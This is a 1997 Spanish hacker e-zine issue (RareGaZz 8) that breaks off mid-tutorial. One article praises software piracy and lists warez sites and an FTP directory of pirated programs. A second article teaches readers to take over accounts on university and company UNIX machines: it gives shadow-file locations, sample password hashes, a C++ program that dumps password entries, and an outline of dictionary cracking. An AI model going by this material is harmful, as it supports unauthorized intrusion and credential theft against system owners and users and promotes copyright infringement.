Copy Link
Add to Bookmark
Report

RareGaZz Issue 08

eZine's profile picture
Published in 
RareGaZz
 · 30 Dec 2020

  

Í1/septiembre/1997ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ <<::RareGaZz::>>ÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ "Mex & Co."ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄ En este numero:ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄ 1.WareZ WorldÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄ 2.Cracking cualquier sistema UNIXÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄÄ 3.Como destruir a la competenciaÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄÄÄ 4.Los secretos del Carding!ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄÄÄÄ 5.Phreaking & HackingÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 6.Los Hackers de las MacintoshÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 7.Los malos de CYBERsitterÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 8.Surfeo de PuertosÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 9.Denial of Service -una introduccion-ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 10.L3TZ HACK! "Low Fat"ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 11.B00/\/\3R4/\/GÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ 12.NotiLOONSÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄ La Informacion que en este numero aparece *puede* servirÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄ para causar da¤o a una compa¤ia o sistema y nadie de losÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄ que colaboran y/o editan esta revista debe ser se¤aladoÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄ como responsable. No respondemos chipote con sangre... ÍÍÍÍÍÍÍÍÍÍÍ
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Design: SwoishÍ
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Mr.X - RareTrip - ServerHacker - GuyBrush - Azumlord - LePompeItor - KillerBot
CrackSmoker - Swoish - Groovy - Nopal Picudo
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
* http://www.geocities.com/Baja/4426 *
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Para contactar a RareGaZz via email:
RAREGAZZ@BIGFOOT.COM

opcionalmente y dependiendo del mensaje puedes encriptarlo con esta llave

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3

mQENAzPMAlMAAAEIAMZQzI19DkA4QyK80OIExuCrZhp840Qn33nMC1laDoMAFPdU
M/eXfxWnGb5cl0JX4UsmqYhH06w6Eh7LKN3M8uihxl7grSqyrK0kWheDpCS2gTCV
qoD8FM5sjQon/vDtc0rMy3qm9JUSKEEiN9NiAlT4Ppa5Ms5rFxT8VAxRJ6PYuh99
3jvDGhjMmKsNatv3UKiNiztfOtfP+FzO/NouPpUh38q2/OryHIgBsoGSIKJjWwHw
jhsj0PHl2cHoRsYWJhFCfAHFcQ29jiU17JFItxvZ8klEgPS/jRphpi93ICJ1pWq7
2TSZ2Y+fH4LBlRgGZ/pmkrtAahP7rjA7ZhGTxN0ABRG0KVJhcmVHYVp6IDIwNDgg
Qml0cyA8UkFSRUdBWlpAQklHRk9PVC5DT00+
=e/tl
-----END PGP PUBLIC KEY BLOCK-----

" ­­­ Viva Mejicouu !!! "
-Inversionista Extranjero

" Whats the buzz? tell what's happening "
-Jesucristo super estrella

" Ella se estrello con el, en una exposicion de arte. Por el golpe, su celular
se estropeo. Se enamoraron y se fueron a vivir juntos. Pero el jamas le
perdono que ella precisamente le hubiera da¤ado su telefono. Nunca se lo
perdono. Ni hoy, que vive solo. http://members..tripod.com/~fab/fab "


[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
ð INTRO - INTRO - INTRO - INTRO - INTRO - INTRO ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

Joh, Joh, Joh - Es navidad de nuevo en internet y este a¤o te amanecio otro
nuevo numero de RareGaZz bajo tu webpage favorita. Seguramente te habras
portado excelente como para estar leyendo este zine desde el comfort de tu
computadora en cualquier parte del mundo.

Muchas cosas nuevas por 'aca en el Polo Norte venados vienen y venados van
pero el trineo sigue jalando para repartir juguetes a todos los aficionados
al hacking y otras terminantes en "king" como Phreaking & Cracking que hablan
o entienden el lenguaje preferido de los dioses ... espa¤ol.

Desesperado por que santa no llega? Pues dirigite a su escondite secreto en
www.geocities.com/Baja/4426 para ver a los duendes trabajar consiguiendo
software y links nuevos para tu placer y satisfaccion personal.

Bueno es hora de abrir el viejo saco de sorpresas y poner a tu disposicion
todo el contenido para tu deleite intelectual y emocional. Recuerda que si
te portas bien pronto habra regalos de nuevo. Portate mal y tendras que
esperar otro mes para que santa te visite de nuevo :-)

Santa Claus alias raretrip.
@@@@@@@@@@@@@@@@@@@@@@@@@@@

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
ð Este texto debera ser leido usando un editor MSDOS ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

= WareZ World =
por KillerBot para RareGaZz

Quizas algunos no saben lo que es o significa el warez ni sus principios
o razon de existir, aunque estoy familiarizado con algunos grupos de warez
no por que escriba este texto quiero decir que se todo sobre este modo de
vida. Simplemente es mi opinion personal y asi debe ser tomada.

El warez existe desde los principios de la informatica actual cuando
empezaron a aparecer productos de software que se comercializaban para
generar ingresos economicos a una persona o compa¤ia. El boom o lo que
desato al mundo warez fueron las BBS a principios del a¤o 1985 con
velocidades maximas de 2400bps la mayoria pero tambien existian pocas
(por el carding) con soporte hasta de 9600bps. La velocidad de aquel entonces
era suficiente, aun no existian los programas de seis u ocho megas que
existen ahora. Basicamente el "warez" era codigo fuente de Cobol, Basic y
peque¤os programas compilados de 300k a 500k

Con el avance de las computadoras y el desarrollo rapido de la industria del
software se necesitaba una ley que prohibiera el copiado y distribucion de
codigo fuente o compilado para proteger los derechos de autor o los ingresos
de la compa¤ia. Aqui en Mexico esta ley se creo y se hecho a funcionar hace
poco tiempo pero en los estados unidos fue aprox. en 1987 cuando la ley
entro en vigor. Esto solo significo una cosa: lo que haciamos en las BBS como
"El escondite de BatMan" y "El agujero negro" en El paso Texas se convirtio
en algo ilegal. Pronto desaparecieron estas BBS con cargos legales en su
contra y la confiscacion del equipo. Los SysOps de estas bbs y los que
ayudabamos a mantenerla con el mejor software que habia eramos apenas chicos
de 16 a 17 a¤os...era 1988...en Texas.

Un poco asustado yo me retire del mundo warez al ver como mis mejores amigos
y los sysops de las bbs que frecuentaba eran sometidos a penas como servicio
social y multas. Se hablaba de que el mundo warez jamas volveria a surgir.
Sabiamos que era el fin, el grand finale del imperio que formaron las bbs
contra compa¤ias transnacionales.

Es verdad que el mundo warez aqui permanecio callado como 2 o 3 a¤os, el
unico intercambio de software pirata era con conocidos y por medio de
diskettes y eso disminuia gracias a la cobertura amarillista de la prensa
en esos a¤os sobre los virus informaticos. Muchos de nosotros tuvimos que
caer en el infortunio de ir a una tienda de software a comprar, repito,
comprar! software a pesar de habernos mal acostumbrado por tantos a¤os...

Internet

Tenia 18 a¤os cuando escuche y comprendi esa palabra por la boca de un
profesor de mi prepa ya en Mexico. Por suerte conocia a un compa¤ero que
tenia un login y password en el sistema internet de una escuela de ingenieria
y empezamos a ver que hacia X comando y luego este otro hasta que pude ver en
UNIX el regreso del mundo warez que ya casi habia olvidado a pesar de que en
El Paso seguian los arrestos. Con Internet y UNIX llego FTP y esa herramienta
fue el resurgimiento del mundo warez mundial ya no solamente local como lo
fueron las BBS. Era la oportunidad para el mundo warez de surgir mundialmente
y no pensabamos dejarla pasar.

¨ What's wrong with Warez ?

Que hay de malo con el warez? NADA. Absolutamente nada, es mas creo que es
un servicio a la comunidad de estudiantes del mundo entero. Si eres un
profesional que usas un programa warez para ganar dinero...pudrete en el
infierno. El mayor logro del warez es brindar las herramientas necesarias
para un buen trabajo universitario [ o de cualquier nivel ] a personas sin
los ingresos necesarios para comprar 9 diskettes a 200 dolares!

El warez d00d tambien debe tener valores. No podria yo distribuir un programa
que vale el dinero que cuesta por que entonces estaria haciendo algo lame.
Pero ¨ como saber si el software vale lo que pide ? Simple, si el programa
lo escribio una compa¤ia grande como Oracle o Microsoft entonces copy tha'
motha fucker! pero si el programa fue el esfuerzo de un programador y pide
de 20 a 25 dolares por el entonces por que esforzarnos en copiarlo? Una copia
original de un programa deberia costar entre 10 y 15 dolares por persona pero
el costo de distribucion, paqueteria y demas aumenta el precio unos 10
dolares mas pero no 50! Los mejores programadores han dado su software GRATIS
solo vean a Mosaic el primer navegador de la red 100% gratuito, pero llego
Netscape y Microsoft y comenzo la carrera capitalista.

Tengo entendido que el Microsoft Office 97 ya esta en algunos ftp's en
internet. Magnifico. Seguramente ayudara a muchas personas con su trabajo
sin vaciarles el bolsillo. Esta es mi vision de los programas "piratas" que
son la oveja negra y descarriada del Tio Sam y Mr.Gates. Si no les gustaria
ver su programa accesible a cualquier persona en un ftp anonimo la solucion
no es un virus, tampoco candados o claves (para eso hay crackers), la unica
solucion permanente y efectiva es hacer FREEWARE!

Sitios donde puedes conseguir WareZ (hot spots):

Los mejores 50 sitios WareZ
http://www.absoluteaccess.com/wareznet/index.htm

Express's WareZ Main Page
http://www.icwater.com/express/main.htm

Rastastugan Password Appz: need
http://hem2.passagen.se/joppe666/INDE.HTM
-Norton antivirus
-Kais PowerGoo
-Kais Powertools
-y 256 programas mas!

Lamer''S WareZ Direct Download
http://pages.infinit.net/atix/lame/apps.htm


Por FTP:
148.202.33.10 - Universidad de Guadalajara
/pub/incoming
-Norton Utilities ( 7 discos )
-Mucho Warez!

[ En el sitio FTP de la universidad de G. tambien encontraran un directorio
con la letra de las canciones de sus grupos favoritos. Tengo que decirles
que quede muy impresionado cuando encontre la letra de todos los albums que
ha lanzado PIXIES asi como NIRVANA. No se pierdan la oportunidad de tener
la letra de sus canciones favoritas y visiten el directorio:
/pub/canciones/letras
y si quieren la letra de Nirvana
/pub/canciones/letras/n/nirvana
o la de Pixies
/pub/canciones/letras/p/pixies
Tambien hay sitios donde pueden conseguir la musica en formato .au uno de
estos es: http://alpes.eurecom.fr/~egal/songs/
Si quieren checar calidad: http://alpes.eurecom.fr/~egal/songs/Pixies/
para descomprimir los archivos necesitaran www.winzip.com y para escuchar
la musica algun buen editor de archivos (.au) como Cool Edit para aumentar
la calidad del archivo a estereo y reducir la cantidad de ruido. ]

[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]
ð Se egoista y comparte tus textos unicamente con RareGaZz ð
[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+][+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]*[+]

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ COMO CRACKER CUALQUIER SISTEMA BASADO EN UNIX ³
³ (Conceptos basicos) ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ Por: Guybrush ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ E-Mail: guybrush@axis.org ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ INDICE ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

0-Introduccion

1-¨Porque es importante conocer el Unix?

2-¨Porque es facil cracker un sistema Unix?

3-Capturando el fichero passwd
3.1-Unix
3.2-Otros sistemas derivados

4-¨Es posible desencriptar un password?

5-¨Para que sirven los famosos 'diccionarios'?

6-Como averiguar password con diccionarios
6.1-Un programa ejemplo
6.2-Generadores de palabras

7-Cuentas Unix por defecto

8-Despedida


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 0-INTRODUCCION ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

No voy a contaros toda la historia del Unix ya que ademas de ser aburrida,
imagino que estareis hartos de leerla.

Simplemente quiero decir que este es un documento bastante basico sobre
seguridad en Unix, pero que viene muy bien sobre todo a la gente que estudia
o trabaja en alguna Universidad o cualquier otro centro y tiene acceso a un
shell del servidor.

Tambien me gustaria que si alguien tiene dudas sobre lo que aqui escribo, o
cualquier otra cosa, me mande un e-mail.


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 1-¨POR QUE ES IMPORTANTE CONOCER UNIX? ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Unix es un sistema operativo multitarea y multiusuario, y que ademas, lleva
muchos a¤os funcionando como tal. Aunque con la aparicion del Windows NT
(aparentemente bastante seguro, aunque con muchos bugs :) - pero eso es otro
tema) este decreciendo el numero de empresas que usan Unix, sigue siendo hoy
en dia uno de los sistemas operativo mas 'seguros' que existen. Por lo que
muchisimas empresas (y sobre todo Universidades) lo usan. Ademas es mas facil
hackear desde un sistema Unix que desde Windows.

¨Como podemos nosotros hackear desde un Unix (o derivado de el)? Debemos
disponer de una cuenta shell (que nos la debe de dar nuestro proveedor de
Internet) o bien accediendo a Internet mediante Linux. Pero esto lo veremos
en otras revistas.

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 2-¨POR QUE ES FACIL CRACKEAR UN SISTEMA UNIX? ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Los que inventaron Unix crearon un sistema bastante seguro, pero no perfecto.
Todos los sistemas tienen bugs, y a pesar de que en cada nueva version hay
menos agujeros, sigue siendo imperfecto. Hay algunos 'fallos' en el dise¤o
del sistema que un programador muy experimentado podria aprovechar. Por
ejemplo: un usuario no puede crear un directorio. No tiene poermiso para ello.
Por lo que cuando hacemos un mkdir, le pasamos el control (por milesimas de
segundo) a root, que es el que se encarga de crearlo y luego devolvernos el
control. ­­Imagina lo que ocurriria si fueramos capaces de causar una inte-
rrupcion en ese peque¤o tiempo en que root tiene el control!! Automaticamente
pasariamos a ser los due¤os y se¤ores del sistema. (lo siento Rabine, no me he
podido resistir) :)

Pero yo no voy a ense¤ar ningun bug, ni tampoco programacion avanzada. Solo
voy a mostrar una forma muy simple de conseguir cuentas. Y si el administrador
es un poco lamer incluso podremos ser root.

El sistema Unix tiene un metodo de cifrado muy bueno, pero guarda la informa-
cion de todos los usuario junto con sus password (logicamente cifrados) en
un fichero. El fichero passwd.


ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 3-CAPTURANDO EL FICHERO PASSWD ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄ¿
³3.1-UNIX³
ÀÄÄÄÄÄÄÄÄÙ

En Unix es muy sencillo leer este fichero, ya que es accesible a cualquier
usuario. Se encuentra en el directorio /etc. Y tiene la siguiente forma:

paco:ZbkEM2vQVowcw:10013:202:PACO SANCHEZ PENADES:/home/paco:/bin/ksh
elisa:GeJuwMrBVa6mg:10016:202:ELISA J. CRIVILLES:/home/elisa:/bin/ksh
pepe:GezuA6krN/BsE:10019:202:PEPE PE¥ALVER BENAVENT:/home/pepe:/bin/ksh
juan:Ge7EPYLjRYX9I:10022:202:JUAN BELLIDO IBORRA:/home/juan:/bin/ksh

¨Que significa todo esto? Veamos. el fichero contiene estos datos:

1:2:3:4:5:6:7

donde:

1) nombre del usuario
2) password encriptado
3) numero UID (identificacion de usuario)
4) numero GID (identificacion de grupo)
5) datos del usuario
6) directorio de trabajo
7) directorio del shell

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³3.2-OTROS SISTEMAS DERIVADOS³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

No todos los sistemas guardan el fichero passwd en /etc. He aqui una lista de
varios sistemas y sus directorios:

AIX 3 /etc/security/passwd
A/UX 3.0s /tcb/files/auth/?
BSD4.3-Reno /etc/master.passwd
ConvexOS 10 /etc/shadpw
ConvexOS 11 /etc/shadow
DG/UX /etc/tcb/aa/user/
EP/IX /etc/shadow
HP-UX /.secure/etc/passwd
IRIX 5 /etc/shadow
Linux 1.1 /etc/shadow
OSF/1 /etc/passwd[.dir|.pag]
SCO Unix #.2.x /tcb/auth/files/<first letter
SunOS4.1+c2 /etc/security/passwd.adjunct
SunOS 5.0 /etc/shadow
System V Release 4.0 /etc/shadow
System V Release 4.2 /etc/security/* database
Ultrix 4 /etc/auth[.dir|.pag]
UNICOS /etc/udb

(lista sacada de los FAQ de alt.2600)

En muchos de estos sistemas, el directorio que contiene el fichero passwd no
es de acceso a usuarios que no sean root, por lo que no podemos ver el conte-
nido del directorio. Pero esto no es ningun impedimento para nosotros. Aqui
posteo un peque¤o programa con el que reconstruimos el fichero passwd, a pesar
de que no podamos acceder a el:

------------------------ cortar por aqui -------------------------------------
// Programa que reconstruye el fichero passwd.
// Copyright (c) Guybrush
// Compilar en c++ y redireccionar la salida a un fichero
// cc cogerPass.cc -o cogerPass > fichero


#include <iostream.h>
#include <pwd.h>


struct passwd *pw;


main()
{
while ((pw = getpwent()) != NULL)
{
cout << pw->pw_name;
cout << ":" << pw->pw_passwd;
cout << ":" << pw->pw_uid;
cout << ":" << pw->pw_gid;
cout << ":" << pw->pw_gecos;
cout << ":" << pw->pw_dir;
cout << ":" << pw->pw_shell << endl;
}

endpwent();
}
------------------------ cortar por aqui -------------------------------------

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 4-¨ES POSIBLE DESENCRIPTAR UN PASSWORD? ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Ningun cifrado es indescrifrable, pero hay algunos que con los ordenadores
de hoy en dia se tardarian muchos a¤os en poder descifrar, como es el caso
del cifrado de Unix.

Cuando creamos un password, Unix aplica sobre el el algoritmo de cifrado lla-
mado DES, el cual era un algoritmo practicamente indescifrable cuando se ideo,
pero que con el paso del tiempo y la tremenda evolucion de la tecnologia, cada
dia se hace mas posible su desencriptado, dada la velocidad de los ordenadores
actuales. Pero la cosa no es tan facil ya que Unix no aplica este algoritmo
una sola vez, sino que lo aplica 25 veces. Una vez que encripta la palabra, la
vuelve a encriptar, y asi sucesivamente, hasta 25. Y por si fuera poco, a la
palabra resultante le a¤ade dos caracteres mas, llamados 'salt', que provienen
de la hora de encriptado. Es decir, si nosotros encriptamos la palabra 'pepe'
a las 20:00 y la volvemos a encriptar a las 20:05 (por ejemplo), la palabra
cifrada resultante no es la misma.

Cada palabra tiene ­­4.096 formas distintas!! de desencriptarse. Por lo que
si has pensado alguna vez en descifrar una palabra ... ni lo sue¤es (por lo
menos con los ordenadores de hoy en dia). Es practicamente imposible (se tar-
daria una eternidad). Por eso recurrimos a los diccionarios...

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 5-¨PARA QUE SIRVEN LOS FAMOSOS DICCIONARIOS? ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Como hemos visto, no podemos descifrar un password, pero si que podemos cifrar
palabras con todos los salt posibles y compararlas con la que ya tenemos ci-
frada. Por ejemplo, ciframos la palabra 'arbol', le quitamos el salt y le a¤a-
dimos todas las combinaciones. Luego las comparamos con el password ya cifrado
y si son iguales ... ­ya tenemos la clave!. Pero tampoco es cuestion de comen-
zar a introducir palabras por teclado ya que se nos haria eterno y muy engo-
rroso, por lo que primero podemos construir un diccionario (hay muchos en
Internet), el cual le pasaremos como parametro al programa comparador que ten-
gamos. Y el se encargara de realizar todo el trabajo.

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 6-¨COMO AVERIGUAR PASSWORD CON DICCIONARIOS? ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³6.1-UN PROGRAMA EJEMPLO³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

He aqui un peque¤o programa que encripta y comprara palabras. Es de lo mas
basico, por lo que no deberias tener ningun problema en entenderlo. Tambien
